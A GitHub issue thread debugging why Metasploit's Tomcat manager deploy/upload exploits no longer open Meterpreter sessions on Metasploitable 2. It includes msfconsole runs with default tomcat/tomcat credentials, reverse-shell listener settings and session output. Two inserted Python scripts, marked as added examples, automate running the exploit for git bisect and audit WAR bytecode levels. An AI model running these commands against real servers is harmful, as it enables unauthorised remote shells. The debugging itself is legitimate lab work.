
multi/http/tomcat_mgr_deploy and multi/http/tomcat_mgr_upload not working (anymore) in latest Metasploit versions against Tomcat 5.5 in Metasploitable 2 #19174

Open
onillap opened this issue May 8, 2024 · 6 comments
Labels
bug confirmed Issues confirmed by a committer


@onillap

onillap commented May 8, 2024

Steps to reproduce

How'd you do it?

  1. Download Kali, update it and run msfconsole
  2. Download Metasploitable 2 VM and run it
  3. Select multi/http/tomcat_mgr_deploy and configure it as:
  4. set HttpUsername tomcat
  5. set HttpPassword tomcat
  6. set RHOSTS to IP address of Metasploitable 2 VM
  7. set RPORT 8180
  8. run

This exploit fails, but used to work in previous 6.2.x and 6.3.x Metasploit versions.
Also exploit/multi/http/tomcat_mgr_upload fails in a very similar way, but I don't know if this one previously worked or not...

Were you following a specific guide/tutorial or reading documentation?

No

Expected behavior

In previous versions of Metasploit, for example 6.2.20 and 6.3.16, the exploit worked and I always got a Meterpreter shell.

Current behavior

msf6 exploit(multi/http/tomcat_mgr_deploy) > run

[*] Started reverse TCP handler on 192.168.1.195:4444
[*] Attempting to automatically select a target...
[*] OK - Server info
Tomcat Version: Apache Tomcat/5.5
OS Name: Linux
OS Version: 2.6.24-16-server
OS Architecture: i386
JVM Version: 1.5.0
JVM Vendor: Free Software Foundation, Inc.

[*] Automatically selected target "Linux x86"
[*] Uploading 6130 bytes as J5kgeJK2VwgsZjYwJINJd.war ...
[*] Executing /J5kgeJK2VwgsZjYwJINJd/sqlYt1OOhUN2.jsp...
[-] Execution failed on J5kgeJK2VwgsZjYwJINJd [500 Internal Server Error]
[*] <title>Apache Tomcat/5.5 - Error report</title><style></style>

HTTP Status 500 -


type Exception report

message

description The server encountered an internal error () that prevented it from fulfilling this request.

exception

javax.servlet.ServletException: Wrapper cannot find servlet class metasploit.PayloadServlet or a class it depends on
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151)
org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:874)
org.apache.coyote.http11.Http11BaseProtocol$Http11ConnectionHandler.processConnection(Http11BaseProtocol.java:665)
org.apache.tomcat.util.net.PoolTcpEndpoint.processSocket(PoolTcpEndpoint.java:528)
org.apache.tomcat.util.net.LeaderFollowerWorkerThread.runIt(LeaderFollowerWorkerThread.java:81)
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689)
java.lang.Thread.run(libgcj.so.81)

root cause

java.lang.ClassNotFoundException: metasploit.PayloadServlet
org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1362)
org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1208)
java.security.AccessController.doPrivileged(libgcj.so.81)
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151)
org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:874)
org.apache.coyote.http11.Http11BaseProtocol$Http11ConnectionHandler.processConnection(Http11BaseProtocol.java:665)
org.apache.tomcat.util.net.PoolTcpEndpoint.processSocket(PoolTcpEndpoint.java:528)
org.apache.tomcat.util.net.LeaderFollowerWorkerThread.runIt(LeaderFollowerWorkerThread.java:81)
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689)
java.lang.Thread.run(libgcj.so.81)

note The full stack trace of the root cause is available in the Apache Tomcat/5.5 logs.


Apache Tomcat/5.5


[*] Undeploying J5kgeJK2VwgsZjYwJINJd ...

[*] Exploit completed, but no session was created.

Metasploit version

Framework: 6.4.5-dev
Console : 6.4.5-dev

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

[framework/ui/console]
ActiveModule=exploit/multi/http/tomcat_mgr_deploy

[multi/http/tomcat_mgr_deploy]
HttpPassword=tomcat
HttpUsername=tomcat
RHOSTS=192.168.1.148
RPORT=8180
VERBOSE=true
loglevel=3
WORKSPACE=
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
VHOST=
SSL=false
Proxies=
UserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
HttpRawHeaders=
DigestAuthIIS=true
SSLVersion=Auto
FingerprintCheck=true
DOMAIN=WORKSTATION
HttpClientTimeout=
HttpTrace=false
HttpTraceHeadersOnly=false
HttpTraceColors=red/blu
SSLServerNameIndication=
HTTP::uri_encode_mode=hex-normal
HTTP::uri_full_url=false
HTTP::pad_method_uri_count=1
HTTP::pad_uri_version_count=1
HTTP::pad_method_uri_type=space
HTTP::pad_uri_version_type=space
HTTP::method_random_valid=false
HTTP::method_random_invalid=false
HTTP::method_random_case=false
HTTP::version_random_valid=false
HTTP::version_random_invalid=false
HTTP::uri_dir_self_reference=false
HTTP::uri_dir_fake_relative=false
HTTP::uri_use_backslashes=false
HTTP::pad_fake_headers=false
HTTP::pad_fake_headers_count=0
HTTP::pad_get_params=false
HTTP::pad_get_params_count=16
HTTP::pad_post_params=false
HTTP::pad_post_params_count=16
HTTP::shuffle_get_params=false
HTTP::shuffle_post_params=false
HTTP::uri_fake_end=false
HTTP::uri_fake_params_start=false
HTTP::header_folding=false
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
PATH=/manager
LHOST=192.168.1.195
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
JavaMeterpreterDebug=false
Spawn=2
AESPassword=
AutoLoadStdapi=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
MeterpreterDebugBuild=false
MeterpreterDebugLogging=

Database Configuration

The database contains the following information:

Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

109    search tomcat
110    use exploit/multi/http/tomcat_mgr_deploy
111    show options
112    set HttpPassword tomcat
113    set HttpUsername tomcat
114    set RHOSTS 192.168.75.128
115    set RPORT 8180
116    run
117    set RHOSTS 192.168.1.148
118    run
119    set verbose true
120    run
121    use exploit/multi/http/tomcat_mgr_upload
123    info
124    set RHOSTS 192.168.1.148
125    set RPORT 8180
126    set verbose true
127    set HttpPassword tomcat
128    set HttpUsername tomcat
129    run
130    set verbose true
131    run
137    use exploit/multi/http/tomcat_mgr_deploy
138    show options
140    run
141    version
142    set loglevel 3
143    run
144    debug

Framework Errors

The following framework errors occurred before the issue occurred:

[05/08/2024 19:04:51] [e(0)] core: Failed to connect to the database: No database YAML file

Web Service Errors

The following web service errors occurred before the issue occurred:

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

[07/04/2023 16:36:13] [e(0)] core: Failed to connect to the database: No database YAML file
[07/04/2023 16:36:19] [d(0)] core: HistoryManager.push_context name: :msfconsole
[07/04/2023 16:47:45] [d(0)] core: HistoryManager.push_context name: :meterpreter
[07/04/2023 16:51:10] [w(0)] core: monitor_rsock: the remote socket has been closed, exiting loop
[07/04/2023 16:52:28] [d(0)] core: HistoryManager.pop_context name: :meterpreter
[07/04/2023 16:54:55] [d(0)] core: monitor_rsock: EOF in rsock
[07/04/2023 16:54:55] [d(0)] core: monitor_rsock: EOF in rsock
[07/04/2023 16:54:56] [d(0)] core: HistoryManager.push_context name: :meterpreter
[07/04/2023 16:56:16] [w(0)] core: monitor_rsock: the remote socket has been closed, exiting loop
[07/04/2023 16:59:34] [d(0)] core: HistoryManager.pop_context name: :meterpreter
[07/04/2023 16:59:34] [w(0)] core: Session 2 has died
[07/04/2023 16:59:44] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[05/08/2024 19:04:51] [e(0)] core: Failed to connect to the database: No database YAML file

Web Service Logs

The following web service logs were recorded before the issue occurred:

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Framework: 6.4.5-dev
Ruby: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.1.4 24 Oct 2023
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
@onillap onillap added the bug label May 8, 2024
@nrathaus
Contributor

@onillap not sure if it will work to solve your issue, but can you pick a different payload via the target Linux x86 option?

@onillap
Author

onillap commented May 15, 2024

Hello,
I need a meterpreter shell and there is a limited set of payloads to try but all of them fail.
For example:
msf6 exploit(multi/http/tomcat_mgr_deploy) > set payload payload/multi/meterpreter/reverse_http
payload => multi/meterpreter/reverse_http
msf6 exploit(multi/http/tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  tomcat           no        The password for the specified username
   HttpUsername  tomcat           no        The username to authenticate as
   PATH          /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.1.148    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         8180             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                          no        HTTP server virtual host

Payload options (multi/meterpreter/reverse_http):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.195    yes       The local listener hostname
   LPORT  8080             yes       The local listener port
   LURI                    no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/tomcat_mgr_deploy) > run

[*] Started HTTP reverse handler on http://192.168.1.195:8080
[*] Attempting to automatically select a target...
[*] OK - Server info
Tomcat Version: Apache Tomcat/5.5
OS Name: Linux
OS Version: 2.6.24-16-server
OS Architecture: i386
JVM Version: 1.5.0
JVM Vendor: Free Software Foundation, Inc.

[*] Automatically selected target "Linux x86"
[*] Uploading 1479 bytes as uUagkTkaJ7.war ...
[*] Executing /uUagkTkaJ7/b9AfoA8QePXs2gxo9wIqmm8r.jsp...
[*] Undeploying uUagkTkaJ7 ...

[*] Exploit completed, but no session was created.

I also tried payload/java/shell/bind_tcp and payload/java/shell/reverse_tcp and others but it makes no difference.
Something has changed from version 6.4 and broke at least this exploit against Metasploitable 2, which is odd since it's a good VM to use for learning.

@adfoster-r7 adfoster-r7 added the confirmed Issues confirmed by a committer label May 15, 2024
@adfoster-r7
Contributor

adfoster-r7 commented May 15, 2024

Metasploit 6.4.x 🔴

msf6 exploit(multi/http/tomcat_mgr_deploy) > run rhost=192.168.123.132 rport=8180 lhost=192.168.123.1 httptrace=true httppassword=tomcat httpusername=tomcat

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Attempting to automatically select a target...
....

####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 2880
Date: Wed, 15 May 2024 21:40:48 GMT
Connection: close

<html><head><title>Apache Tomcat/5.5 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>javax.servlet.ServletException: Wrapper cannot find servlet class metasploit.PayloadServlet or a class it depends on
	org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)
	org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151)
	org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:874)
	org.apache.coyote.http11.Http11BaseProtocol$Http11ConnectionHandler.processConnection(Http11BaseProtocol.java:665)
	org.apache.tomcat.util.net.PoolTcpEndpoint.processSocket(PoolTcpEndpoint.java:528)
	org.apache.tomcat.util.net.LeaderFollowerWorkerThread.runIt(LeaderFollowerWorkerThread.java:81)
	org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689)
	java.lang.Thread.run(libgcj.so.81)
</pre></p><p><b>root cause</b> <pre>java.lang.ClassNotFoundException: metasploit.PayloadServlet
	org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1362)
	org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1208)
	java.security.AccessController.doPrivileged(libgcj.so.81)
	org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)
	org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151)
	org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:874)
	org.apache.coy ....

[*] Exploit completed, but no session was created.

Metasploit 6.1.x 🟢

msf6 exploit(multi/http/tomcat_mgr_deploy) > run rhost=192.168.123.132 rport=8180 lhost=192.168.123.1 httptrace=true httppassword=tomcat httpusername=tomcat

....

[*] Sending stage (58082 bytes) to 192.168.123.132
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.132:36369) at 2024-05-15 22:43:19 +0100

meterpreter > 

Would need to run a git bisect to work out where the issue is, similar to this issue

@onillap
Author

onillap commented May 22, 2024

Since the error seems to be "javax.servlet.ServletException: Wrapper cannot find servlet class metasploit.PayloadServlet or a class it depends on", probably it might be related to this change which adds support for newer JDKs but breaks it with older ones:
rapid7/metasploit-payloads#672

@adfoster-r7
Contributor

Thanks for taking a look 👍

If this pull request fails #18445 - i.e. git checkout 7f7f106b923a2ff7a8d76a46dbabc6c20be902c2 and the previous commit passes, i.e. git checkout 7f7f106b923a2ff7a8d76a46dbabc6c20be902c2~1 - then that would be a good confirmation of those changes being the issue 👀
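
A driver for the `git bisect run` step proposed in the two adfoster-r7 comments above, added here as an illustration; it is not part of this thread and not Metasploit code. It runs the module non-interactively from the current checkout, classifies the console output using the strings quoted in this issue, and maps the verdict onto the exit codes `git bisect run` understands (0 good, 1 bad, 125 untestable, skip). The target address, credentials and msfconsole path are placeholders for a lab like the Metasploitable 2 VM; the `bundle install` before each run is there because the metasploit-payloads gem pin changes between commits. Only `classify` and `msf_resource` run offline; `run_once` needs a checkout and a live target.

```python
"""bisect_tomcat.py: verdict script for `git bisect run` over metasploit-framework.

Added example (not from the issue thread or the Metasploit project).  It runs
exploit/multi/http/tomcat_mgr_deploy once against a lab target and exits with
the code git bisect expects for that commit.
"""
import re
import subprocess
import sys

GOOD, BAD, SKIP = 0, 1, 125  # exit codes understood by `git bisect run`

# Patterns taken from the console output quoted in this issue.
SESSION_RE = re.compile(r"Meterpreter session \d+ opened")
NO_SESSION_RE = re.compile(r"Exploit completed, but no session was created")
CLASS_ERR_RE = re.compile(r"ClassNotFoundException: metasploit\.PayloadServlet")


def classify(console_output: str) -> int:
    """Map msfconsole output to a bisect exit code.

    A session means the commit is good.  The ClassNotFoundException, or a plain
    'no session was created', means the regression is present.  Anything else
    (e.g. a commit whose gems will not bundle, so the module never ran) is
    untestable and must be skipped, not recorded as bad, or bisect converges
    on the wrong commit.
    """
    if SESSION_RE.search(console_output):
        return GOOD
    if CLASS_ERR_RE.search(console_output) or NO_SESSION_RE.search(console_output):
        return BAD
    return SKIP


def msf_resource(rhost, rport, lhost, user, password) -> str:
    """Command string for `msfconsole -x`: run the module once, reap sessions, exit."""
    return ";".join([
        "use exploit/multi/http/tomcat_mgr_deploy",
        f"set RHOSTS {rhost}", f"set RPORT {rport}", f"set LHOST {lhost}",
        f"set HttpUsername {user}", f"set HttpPassword {password}",
        "set AutoVerifySessionTimeout 30",
        "run -z",        # do not drop into the session if one opens
        "sessions -K",   # kill it so the next bisect step starts clean
        "exit -y",
    ])


def run_once(rhost, rport, lhost, user="tomcat", password="tomcat",
             msfconsole="./msfconsole", timeout=600) -> int:
    """Bundle the checkout's gems, run the module once, return the bisect verdict."""
    try:
        # gem pins (metasploit-payloads among them) change between commits
        if subprocess.run(["bundle", "install", "--quiet"]).returncode != 0:
            return SKIP
        proc = subprocess.run(
            [msfconsole, "-q", "-n", "-x", msf_resource(rhost, rport, lhost, user, password)],
            capture_output=True, text=True, timeout=timeout)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return SKIP
    return classify(proc.stdout + proc.stderr)


if __name__ == "__main__":
    # Usage from the framework checkout, with placeholder lab addresses:
    #   git bisect start <bad-commit> <good-commit>
    #   git bisect run python3 bisect_tomcat.py 192.168.1.148 8180 192.168.1.195
    if len(sys.argv) != 4:
        print("usage: bisect_tomcat.py RHOST RPORT LHOST", file=sys.stderr)
        sys.exit(SKIP)
    sys.exit(run_once(*sys.argv[1:4]))
```

The candidate pair named above (7f7f106b923a2ff7a8d76a46dbabc6c20be902c2 as bad, its parent as good) would be the start points; because the gemspec changes are the suspect, the script skips rather than fails commits where bundling breaks.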

@wolfcod

wolfcod commented May 23, 2024

Hello, I ran some tests, and this is the output

The commit 7f7f106b923a2ff7a8d76a46dbabc6c20be902c2~1 is working fine, it uses the gem metasploit-payloads 2.0.154.

The commit 7f7f106b923a2ff7a8d76a46dbabc6c20be902c2 uses the gem 2.0.156, and the next change in metasploit-framework.gemspec uses directly the gem 2.0.159 (I didn't find 2.0.157 or 2.0.158 in the history).
Running the exploit with this gem doesn't work (Internal Server error).

Commit c73e815
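
A check that follows from onillap's hypothesis (rapid7/metasploit-payloads#672 adding newer-JDK support) and wolfcod's gem comparison above, added here as an illustration rather than taken from the thread or the project. If the newer gem ships servlet classes compiled for a later bytecode level, a JVM reporting 1.5.0 (major version 49 is the Java 5 class-file format) cannot load them, which is one way to end up with "Wrapper cannot find servlet class metasploit.PayloadServlet"; that it is the actual cause is an assumption, not something the thread confirms. The script reads the major version from every class inside a WAR or JAR (the archive tomcat_mgr_deploy uploads, or the gem's bundled java archive, whose paths are not given here) and lists the entries too new for the target JVM. The archive built by `constructed_war` is a constructed sample with fake class-file headers, not real payload bytes.

```python
"""Audit the class-file (bytecode) level of every class inside a Java WAR/JAR.

Added example; not Metasploit or metasploit-payloads code.  Assumption: the
target JVM rejects class files whose major_version exceeds what it supports.
"""
import io
import struct
import zipfile

CLASS_MAGIC = 0xCAFEBABE

# Class-file major_version -> JDK release (JVM spec, ClassFile structure).
MAJOR_TO_JDK = {45: "1.1", 46: "1.2", 47: "1.3", 48: "1.4", 49: "5", 50: "6",
                51: "7", 52: "8", 53: "9", 54: "10", 55: "11", 56: "12",
                57: "13", 58: "14", 59: "15", 60: "16", 61: "17", 62: "18",
                63: "19", 64: "20", 65: "21"}


def class_major_version(data: bytes) -> int:
    """Return major_version from a class-file header: u4 magic, u2 minor, u2 major."""
    if len(data) < 8:
        raise ValueError("not a class file: too short")
    magic, _minor, major = struct.unpack(">IHH", data[:8])
    if magic != CLASS_MAGIC:
        raise ValueError("not a class file: bad magic 0x%08x" % magic)
    return major


def jdk_level(major: int) -> str:
    """Human-readable JDK release for a major_version (unknown values shown raw)."""
    return MAJOR_TO_JDK.get(major, "major %d" % major)


def audit_archive(archive_bytes: bytes) -> dict:
    """Map each .class entry (recursing into nested .jar entries) to its major_version."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(".class"):
                result[name] = class_major_version(zf.read(name))
            elif name.endswith(".jar"):
                for inner, ver in audit_archive(zf.read(name)).items():
                    result[name + "!" + inner] = ver
    return result


def too_new_for(archive_bytes: bytes, jvm_max_major: int) -> list:
    """Entries whose class-file version exceeds what the target JVM accepts."""
    return sorted(n for n, v in audit_archive(archive_bytes).items() if v > jvm_max_major)


def constructed_war() -> bytes:
    """Constructed sample: one class at Java 5 level (49) and one at Java 8 level (52).

    The 'classes' are only headers padded with zeros; they exist to exercise the
    parser and are not real servlet bytecode.
    """
    def fake_class(major: int) -> bytes:
        return struct.pack(">IHH", CLASS_MAGIC, 0, major) + b"\x00" * 8

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/classes/metasploit/PayloadServlet.class", fake_class(52))
        zf.writestr("WEB-INF/classes/metasploit/Payload.class", fake_class(49))
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    # Pass the WAR/JAR path to audit a real archive; with no argument the sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else constructed_war()
    # The target in this issue reports "JVM Version: 1.5.0", i.e. major_version 49 at most.
    for entry, major in sorted(audit_archive(data).items()):
        print("%-60s Java %s" % (entry, jdk_level(major)))
    for entry in too_new_for(data, 49):
        print("too new for a 1.5 JVM:", entry)
```

Running it against the WAR produced by the 2.0.154 gem and again against the 2.0.156 or 2.0.159 one would show directly whether the servlet classes moved to a newer class-file level between the working and failing versions, without needing a target at all.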
